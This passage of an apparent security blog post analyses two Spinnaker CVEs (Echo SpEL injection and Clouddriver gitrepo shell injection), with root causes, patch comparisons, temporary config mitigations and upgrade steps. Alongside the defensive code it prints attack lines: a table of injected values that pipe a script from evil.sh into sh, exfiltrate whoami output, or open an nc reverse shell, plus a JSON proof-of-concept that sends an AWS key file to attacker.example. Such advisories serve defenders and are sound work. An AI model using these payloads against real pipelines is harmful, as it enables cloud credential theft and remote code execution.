&lt;td&gt;Blocked evaluations logged at WARN level (detectable)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Operationally, the allowlist cuts both ways. &lt;strong&gt;Legitimate pipelines that reference non-allowlisted classes may break right after patching&lt;/strong&gt;. Because the patch &lt;strong&gt;logs blocked SpEL evaluations at WARN level&lt;/strong&gt;, both those breakages and any exploitation attempts show up in Echo's logs.&lt;/p&gt;
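&lt;p&gt;Before patching, you can estimate both effects offline by scanning exported pipeline JSON for SpEL type references. The following is a minimal sketch. The allowlist below is only the illustrative subset from the table above, not Spinnaker's actual list. The regex catches only the plain &lt;code&gt;T(some.Type)&lt;/code&gt; form, so obfuscated payloads can slip past it. The function names are hypothetical.&lt;/p&gt;

```python
"""Scan Spinnaker pipeline JSON for SpEL type references (sketch)."""
import json
import re

# Illustrative subset based on the allowlist examples in the table above;
# NOT the real Spinnaker allowlist.
ALLOWED_TYPES = {
    "java.lang.String", "java.lang.Math", "java.lang.Integer",
    "java.lang.Long", "java.lang.Double", "java.lang.Boolean",
    "java.util.List", "java.util.Map",
}
# SpEL resolves java.lang types without a package prefix, so accept short names too.
ALLOWED_SHORT = {
    name.rsplit(".", 1)[1] for name in ALLOWED_TYPES if name.startswith("java.lang.")
}

# Matches only the plain T(some.Type) form; obfuscated payloads may evade it.
TYPE_REF = re.compile(r"\bT\(\s*([A-Za-z_$][\w.$]*)\s*\)")


def walk_strings(node):
    """Yield every string value in a parsed JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from walk_strings(value)
    elif isinstance(node, list):
        for item in node:
            yield from walk_strings(item)


def disallowed_type_refs(pipeline: dict) -> set:
    """Return SpEL type references outside the illustrative allowlist (hypothetical helper)."""
    found = set()
    for text in walk_strings(pipeline):
        for type_name in TYPE_REF.findall(text):
            if type_name not in ALLOWED_TYPES and type_name not in ALLOWED_SHORT:
                found.add(type_name)
    return found


if __name__ == "__main__":
    sample = json.loads("""
    {"name": "exfil-demo",
     "expectedArtifacts": [{"matchArtifact": {
        "name": "${T(java.lang.Runtime).getRuntime().exec('id')}"}}],
     "stages": [{"comment": "${T(Math).max(1, 2)}"}]}
    """)
    print(disallowed_type_refs(sample))  # {'java.lang.Runtime'}
```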

&lt;h2&gt;
  
  
  3. CVE-2026-32604 — Clouddriver Gitrepo Artifact Shell Metacharacter Injection RCE
&lt;/h2&gt;

&lt;p&gt;The second CVE lives in Clouddriver's &lt;code&gt;clouddriver-artifacts-gitrepo&lt;/code&gt; module — specifically the &lt;code&gt;GitJobArtifactDownloader&lt;/code&gt; class. This class is invoked when a gitrepo-typed artifact is referenced in a pipeline; it &lt;em&gt;clones the specified Git repository to local disk&lt;/em&gt; and downloads files at a specific branch / tag / path for downstream stages.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Root Cause — Shell Command String Interpolation Passed to ProcessBuilder
&lt;/h3&gt;

&lt;p&gt;The downloader needs to execute something like &lt;code&gt;git clone --depth 1 --branch &amp;lt;branch&amp;gt; &amp;lt;url&amp;gt; &amp;lt;tmpdir&amp;gt;&lt;/code&gt;. Pre-patch, the code assembled this as &lt;code&gt;List&amp;lt;String&amp;gt; args = ["sh", "-c", "git clone ... " + branch + " ..."]&lt;/code&gt; and called &lt;code&gt;new ProcessBuilder(args).start()&lt;/code&gt;. In other words, &lt;strong&gt;the user-supplied branch string was parsed by the shell inside &lt;code&gt;sh -c&lt;/code&gt;&lt;/strong&gt;. Metacharacters such as &lt;code&gt;;&lt;/code&gt; and &lt;code&gt;&amp;amp;&amp;amp;&lt;/code&gt; chain extra commands, and backticks / &lt;code&gt;$(...)&lt;/code&gt; run as command substitution.&lt;/p&gt;
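&lt;p&gt;The difference is easy to reproduce harmlessly. The sketch below uses Python's &lt;code&gt;subprocess&lt;/code&gt;, whose list form behaves like &lt;code&gt;ProcessBuilder&lt;/code&gt; with an argv array, with no shell involved. It assumes a POSIX system with &lt;code&gt;sh&lt;/code&gt; and &lt;code&gt;echo&lt;/code&gt; on the PATH. Here &lt;code&gt;echo&lt;/code&gt; stands in for &lt;code&gt;git clone&lt;/code&gt;, and the payload is a benign &lt;code&gt;$(echo INJECTED)&lt;/code&gt;.&lt;/p&gt;

```python
"""Show why interpolating user input into `sh -c` is dangerous (sketch)."""
import subprocess

# Stand-in for a user-controlled gitrepo `version` field (benign payload).
branch = "main$(echo INJECTED)"


def via_shell(user_branch: str) -> str:
    # Vulnerable pattern: the whole command is one string parsed by sh,
    # so $(...) in the user value runs as command substitution.
    cmd = "echo clone --branch " + user_branch
    result = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True, check=True)
    return result.stdout.strip()


def via_argv(user_branch: str) -> str:
    # Patched pattern: argv goes straight to the program with no shell parsing,
    # so the value arrives as one literal argument.
    result = subprocess.run(
        ["echo", "clone", "--branch", user_branch],
        capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()


if __name__ == "__main__":
    print(via_shell(branch))  # clone --branch mainINJECTED
    print(via_argv(branch))   # clone --branch main$(echo INJECTED)
```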

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Artifact field&lt;/th&gt;
&lt;th&gt;Example legitimate value&lt;/th&gt;
&lt;th&gt;Example malicious value&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;reference&lt;/code&gt; (URL)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://github.com/org/repo.git&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;https://github.com/org/repo.git; curl evil.sh | sh; #&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Downloaded script executed (RCE)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;version&lt;/code&gt; (branch)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;main&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;main$(curl https://attacker/`whoami`)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;RCE + username exfiltration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;location&lt;/code&gt; (path)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;k8s/deploy.yaml&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;k8s/deploy.yaml; nc evil 4444 -e /bin/sh&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Reverse shell&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;&lt;code&gt;artifactAccount&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;github-prod&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;github-prod`id`&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;RCE + privilege info leak&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The most-cited PoC payload:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"git/repo"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"reference"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/example/x.git"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"version"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"main$(curl https://attacker.example/exfil?h=$(hostname)&amp;amp;u=$(id -un)&amp;amp;k=$(cat /etc/spinnaker/secrets/aws-key))"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"location"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"k8s/"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"artifactAccount"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"github-prod"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When Clouddriver processes this gitrepo artifact, it runs &lt;code&gt;sh -c "git clone --branch main$(curl ...) ..."&lt;/code&gt;. The shell performs the &lt;code&gt;$(curl ...)&lt;/code&gt; command substitution before &lt;code&gt;git&lt;/code&gt; even starts, exfiltrating &lt;code&gt;/etc/spinnaker/secrets/aws-key&lt;/code&gt; to the attacker. Clouddriver is the most sensitive service to lose because it holds the cloud API credentials, so &lt;strong&gt;AWS IAM keys, GCP service account keys, and Azure client secrets are all exposed&lt;/strong&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 ProcessBuilder Invocation Before and After the Patch
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Before patch&lt;/th&gt;
&lt;th&gt;After patch (2026.1.0)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Command assembly&lt;/td&gt;
&lt;td&gt;&lt;code&gt;["sh", "-c", "git clone --branch " + branch + " " + url + " " + dir]&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;["git", "clone", "--branch", branch, url, dir]&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Shell invocation&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Via &lt;code&gt;sh -c&lt;/code&gt; — shell metachar interpretation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Direct &lt;code&gt;git&lt;/code&gt; call — no shell, metachar inert&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Input validation&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;BranchNameValidator&lt;/code&gt; + &lt;code&gt;RefNameValidator&lt;/code&gt; added&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Allowed character pattern&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;^[A-Za-z0-9._\-/]{1,250}$&lt;/code&gt; (a conservative subset of git ref-name rules)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;URL scheme validation&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;Only &lt;code&gt;http(s)://&lt;/code&gt;, &lt;code&gt;ssh://&lt;/code&gt;, &lt;code&gt;git@&lt;/code&gt; allowed — &lt;code&gt;file://&lt;/code&gt;, &lt;code&gt;ext::&lt;/code&gt; blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;On validation failure&lt;/td&gt;
&lt;td&gt;—&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;InvalidGitArtifactException&lt;/code&gt; + audit log&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The core fix is &lt;strong&gt;not going through a shell&lt;/strong&gt;. When &lt;code&gt;ProcessBuilder&lt;/code&gt; receives the argv array directly, no shell parsing occurs. As a result, &lt;code&gt;;&lt;/code&gt;, &lt;code&gt;$(...)&lt;/code&gt;, and backticks reach git as literal characters, and the clone fails with an unknown-ref error instead of running anything. The second line of defense, git ref regex validation, rejects such values before git is even invoked (defense in depth).&lt;/p&gt;
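&lt;p&gt;Both lines of defense fit in a few lines of code. The following is a minimal Python sketch of the same idea. The regex and allowed URL prefixes mirror the table above. The names &lt;code&gt;validate_git_artifact&lt;/code&gt;, &lt;code&gt;build_clone_argv&lt;/code&gt;, and &lt;code&gt;InvalidGitArtifact&lt;/code&gt; are hypothetical, not Clouddriver's &lt;code&gt;BranchNameValidator&lt;/code&gt; / &lt;code&gt;RefNameValidator&lt;/code&gt; API. The leading-dash and &lt;code&gt;..&lt;/code&gt; checks and the &lt;code&gt;--&lt;/code&gt; separator are our own additions.&lt;/p&gt;

```python
"""Validate gitrepo artifact fields, then build a shell-free git argv (sketch).

All names here are hypothetical, not Clouddriver's API.
"""
import re

# Pattern from the patched-behavior table (a conservative subset of git ref rules).
REF_PATTERN = re.compile(r"^[A-Za-z0-9._\-/]{1,250}$")
ALLOWED_URL_PREFIXES = ("http://", "https://", "ssh://", "git@")


class InvalidGitArtifact(ValueError):
    """Raised when a gitrepo artifact field fails validation."""


def validate_git_artifact(url: str, ref: str) -> None:
    if not url.startswith(ALLOWED_URL_PREFIXES):
        # Rejects file://, ext::, and anything that starts with '-'.
        raise InvalidGitArtifact(f"unsupported URL scheme: {url!r}")
    if not REF_PATTERN.fullmatch(ref):
        raise InvalidGitArtifact(f"invalid ref name: {ref!r}")
    # Extra checks beyond the table (our assumption): no option-like refs, no '..'.
    if ref.startswith("-") or ".." in ref:
        raise InvalidGitArtifact(f"invalid ref name: {ref!r}")


def build_clone_argv(url: str, ref: str, dest: str) -> list:
    """Return an argv list for subprocess/ProcessBuilder; never a shell string."""
    validate_git_artifact(url, ref)
    # '--' ends option parsing so url/dest can never be read as git options.
    return ["git", "clone", "--depth", "1", "--branch", ref, "--", url, dest]
```

&lt;p&gt;The result can be passed straight to &lt;code&gt;subprocess.run(build_clone_argv(url, ref, workdir), check=True)&lt;/code&gt;, so no shell ever sees the artifact fields.&lt;/p&gt;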

&lt;h2&gt;
  
  
  4. Temporary Mitigations — Driving Exposure Surface to Zero Before Patching
&lt;/h2&gt;

&lt;p&gt;Two workarounds are usable during the short window before the patches roll out: (1) service-level disable, (2) artifact-type-level disable. ManoIT enabled both while patches were being staged.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Echo SpEL Evaluation Block (Temporary CVE-2026-32613 Mitigation)
&lt;/h3&gt;

&lt;p&gt;The strongest workaround is disabling Echo entirely, but that stops all pipeline triggers (Pub/Sub, Cron, CI completion). The operational cost is too high, so ManoIT chose to &lt;strong&gt;disable only expected-artifact evaluation&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# spinnaker-config/echo-local.yml&lt;/span&gt;
&lt;span class="c1"&gt;# CVE-2026-32613 workaround — disable Echo expected artifacts SpEL evaluation&lt;/span&gt;
&lt;span class="na"&gt;echo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;pipelinetriggers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;artifacts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="c1"&gt;# Force false from April 20 until patches are applied&lt;/span&gt;
      &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="c1"&gt;# SpEL evaluation never runs, so the unrestricted context issue is avoided&lt;/span&gt;
  &lt;span class="na"&gt;events&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Keep triggers themselves — Cron, Pub/Sub continue to work&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

&lt;span class="c1"&gt;# Side effect — pipelines with these patterns won't fire during the block window:&lt;/span&gt;
&lt;span class="c1"&gt;#   - Auto-deploy on Docker image push&lt;/span&gt;
&lt;span class="c1"&gt;#   - Auto-sync on Helm chart release&lt;/span&gt;
&lt;span class="c1"&gt;#   - GitOps sync on Git push&lt;/span&gt;
&lt;span class="c1"&gt;# Route these triggers temporarily via Jenkins/GitLab CI calling the Spinnaker API&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 Clouddriver Gitrepo Artifact Type Disable (Temporary CVE-2026-32604 Mitigation)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# spinnaker-config/clouddriver-local.yml&lt;/span&gt;
&lt;span class="c1"&gt;# CVE-2026-32604 workaround — completely block gitrepo artifact type&lt;/span&gt;
&lt;span class="na"&gt;artifacts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;gitrepo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;   &lt;span class="c1"&gt;# false from April 20 until patches are applied&lt;/span&gt;
  &lt;span class="c1"&gt;# Other artifact types unaffected&lt;/span&gt;
  &lt;span class="na"&gt;github&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;helm&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;http&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;s3&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;gcs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

&lt;span class="c1"&gt;# Side effect — manifest sync pipelines using git/repo must move to github or http types:&lt;/span&gt;
&lt;span class="c1"&gt;#   git/repo + branch=main + path=k8s/  -&amp;gt;  github + commitish=main + path=k8s/&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Workaround Verification Steps
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Check&lt;/th&gt;
&lt;th&gt;Command&lt;/th&gt;
&lt;th&gt;Expected&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Echo artifact triggers disabled&lt;/td&gt;
&lt;td&gt;&lt;code&gt;curl -s http://echo:8089/env | jq '.echo.pipelinetriggers.artifacts.enabled'&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;false&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Clouddriver gitrepo disabled&lt;/td&gt;
&lt;td&gt;&lt;code&gt;curl -s http://clouddriver:7002/artifacts/credentials | jq '.[].types'&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No &lt;code&gt;git/repo&lt;/code&gt; entry in any account's types&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SpEL evaluation rejection log&lt;/td&gt;
&lt;td&gt;&lt;code&gt;kubectl logs -n spinnaker deploy/spin-echo | grep "ArtifactEvaluator disabled"&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Matching log line present&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gitrepo artifact creation blocked&lt;/td&gt;
&lt;td&gt;Try creating a git/repo artifact in the Deck UI&lt;/td&gt;
&lt;td&gt;git/repo no longer offered in the artifact-type dropdown&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Affected pipeline inventory&lt;/td&gt;
&lt;td&gt;&lt;code&gt;spin pipeline list --output json | jq '.[] | …'&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
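&lt;p&gt;The two endpoint checks can be scripted so each instance reports PASS or FAIL once the workaround has rolled out. A minimal Bash sketch, assuming it runs from a pod inside the cluster (so the &lt;code&gt;echo:8089&lt;/code&gt; and &lt;code&gt;clouddriver:7002&lt;/code&gt; hostnames resolve), that &lt;code&gt;curl&lt;/code&gt; and &lt;code&gt;jq&lt;/code&gt; are installed, and that the endpoints return the JSON shapes implied by the &lt;code&gt;jq&lt;/code&gt; filters in the table; the function names are hypothetical.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: the 4.3 endpoint checks as PASS/FAIL lines (hypothetical helper names).

# gitrepo_listed: reads /artifacts/credentials JSON on stdin and succeeds if any
# account still advertises the "git/repo" artifact type.
gitrepo_listed() {
  grep -q '"git/repo"'
}

verify_clouddriver_gitrepo() {
  local body
  # -f makes curl fail on HTTP errors, so an unreachable service is never reported as PASS
  if ! body=$(curl -sf http://clouddriver:7002/artifacts/credentials); then
    echo "ERROR: clouddriver unreachable"
    return 2
  fi
  if printf '%s' "$body" | gitrepo_listed; then
    echo "FAIL: clouddriver still lists git/repo"
    return 1
  fi
  echo "PASS: git/repo artifact type is disabled"
}

verify_echo_artifacts() {
  local enabled
  # An unreachable Echo yields an empty value, which falls through to FAIL
  enabled=$(curl -sf http://echo:8089/env | jq -r '.echo.pipelinetriggers.artifacts.enabled')
  if [ "$enabled" = "false" ]; then
    echo "PASS: Echo artifact triggers disabled"
  else
    echo "FAIL: echo.pipelinetriggers.artifacts.enabled is '$enabled'"
    return 1
  fi
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The Clouddriver check greps for the literal &lt;code&gt;"git/repo"&lt;/code&gt; string instead of parsing JSON. That keeps it free of a &lt;code&gt;jq&lt;/code&gt; dependency, at the cost of also matching the string if it appears anywhere else in the response.&lt;/p&gt;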

&lt;h2&gt;
  
  
  5. Patch Application — Three Distributions: Halyard / Operator / Helm
&lt;/h2&gt;

&lt;p&gt;Spinnaker patch procedures vary by installation method. For 2026.x, the recommended installation methods, in order of preference, are &lt;strong&gt;Operator → Helm → Halyard&lt;/strong&gt;. ManoIT operates four internal instances (two via Operator, one via Helm, one via Halyard), so all three paths were exercised.&lt;/p&gt;

&lt;h3&gt;
  
  
  5.1 Operator-Based Upgrade (Recommended, 2026.x Standard)
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# spinnaker-config.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spinnaker.io/v1alpha2&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;SpinnakerService&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spinnaker&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;spinnaker&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;spinnakerConfig&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;2026.1.0&lt;/span&gt;   &lt;span class="c1"&gt;# April 20 patch — 2026.0.0 -&amp;gt; 2026.0.1, 2025.4.x -&amp;gt; 2025.4.2&lt;/span&gt;
      &lt;span class="na"&gt;persistentStorage&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;persistentStoreType&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;s3&lt;/span&gt;
      &lt;span class="c1"&gt;# After patching, set the §4.1 / §4.2 workarounds back to enabled: true&lt;/span&gt;
      &lt;span class="na"&gt;artifacts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;gitrepo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# restore after patch&lt;/span&gt;
    &lt;span class="na"&gt;profiles&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;echo&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;pipelinetriggers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;artifacts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;   &lt;span class="c1"&gt;# restore after patch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Apply + monitor rolling update&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; spinnaker-config.yaml &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker
kubectl rollout status &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker deploy/spin-echo &lt;span class="nt"&gt;--timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;10m
kubectl rollout status &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker deploy/spin-clouddriver &lt;span class="nt"&gt;--timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;15m

&lt;span class="c"&gt;# Version check&lt;/span&gt;
&lt;span class="k"&gt;for &lt;/span&gt;svc &lt;span class="k"&gt;in &lt;/span&gt;&lt;span class="nb"&gt;echo &lt;/span&gt;clouddriver orca gate front50&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do
  &lt;/span&gt;&lt;span class="nv"&gt;pod&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;kubectl get pod &lt;span class="nt"&gt;-n&lt;/span&gt; spinnaker &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;spin,cluster&lt;span class="o"&gt;=&lt;/span&gt;spin-&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;svc&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; name | &lt;span class="nb"&gt;head&lt;/span&gt; &lt;span class="nt"&gt;-1&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
